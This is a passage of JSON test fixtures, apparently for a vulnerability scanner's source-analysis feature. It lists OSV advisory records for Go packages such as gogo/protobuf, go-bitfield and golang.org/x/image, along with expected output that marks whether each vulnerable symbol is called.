"https://pkg.go.dev/vuln/GO-2023-1572" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.3.0", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "aliases": [ "CVE-2022-41727" ], "summary": "", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ] } ], "groups": [ { "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ] } ] } ] ================================================ FILE: internal/sourceanalysis/testdata/json/input.json ================================================ [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.3.0", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ] } ], "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } ] }, { "package": { "name": "github.com/ipfs/go-bitfield", "version": "1.0.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "aliases": [ "CVE-2023-23626" ], "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments", "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" } }, { "schema_version": "1.3.0", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "summary": "", "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ] } ], "groups": [ { "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ] } ] }, { "package": { "name": "golang.org/x/image", "version": "0.4.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "aliases": [ "CVE-2022-41727" ], "summary": "Uncontrolled Resource Consumption", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.3.0", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "aliases": [ "CVE-2022-41727" ], "summary": "", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/image/tiff", "symbols": [ "Decode", "DecodeConfig", "decoder.ifdUint", "newDecoder" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ] } ], "groups": [ { "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ] } ] } ] ================================================ FILE: internal/sourceanalysis/testdata/json/output-no-call-data.json ================================================ [ { "groups": [ { "experimentalAnalysis": {}, "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } ], "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "version": "1.3.1" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.3.0", "summary": "Improper Input Validation in GoGo Protobuf" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.0", "summary": "" } ] }, { "groups": [ { "experimentalAnalysis": {}, "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ] } ], "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "version": "1.0.0" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ], "versions": [ "1.0.0" ] } ], "aliases": [ "CVE-2023-23626" ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" }, "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "schema_version": "1.3.0", "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "schema_version": "1.3.0", "summary": "" } ] }, { "groups": [ { "experimentalAnalysis": {}, "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ] } ], "package": { "ecosystem": "Go", "name": "golang.org/x/image", "version": "0.4.0" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" }, "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "schema_version": "1.3.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ], "schema_version": "1.3.0", "summary": "" } ] } ] ================================================ FILE: internal/sourceanalysis/testdata/json/output.json ================================================ [ { "groups": [ { "experimentalAnalysis": { "GO-2021-0053": { "called": false } }, "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } ], "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "version": "1.3.1" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121" ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" }, "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "schema_version": "1.3.0", "summary": "Improper Input Validation in GoGo Protobuf" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ], "schema_version": "1.3.0", "summary": "" } ] }, { "groups": [ { "experimentalAnalysis": { "GO-2023-1558": { "called": true } }, "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ] } ], "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "version": "1.0.0" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ], "versions": [ "1.0.0" ] } ], "aliases": [ "CVE-2023-23626" ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" }, "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "schema_version": "1.3.0", "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "schema_version": "1.3.0", "summary": "" } ] }, { "groups": [ { "experimentalAnalysis": { "GO-2023-1572": { "called": false } }, "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ] } ], "package": { "ecosystem": "Go", "name": "golang.org/x/image", "version": "0.4.0" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" }, "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "schema_version": "1.3.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/image/tiff", "symbols": [ "Decode", "DecodeConfig", "decoder.ifdUint", "newDecoder" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": 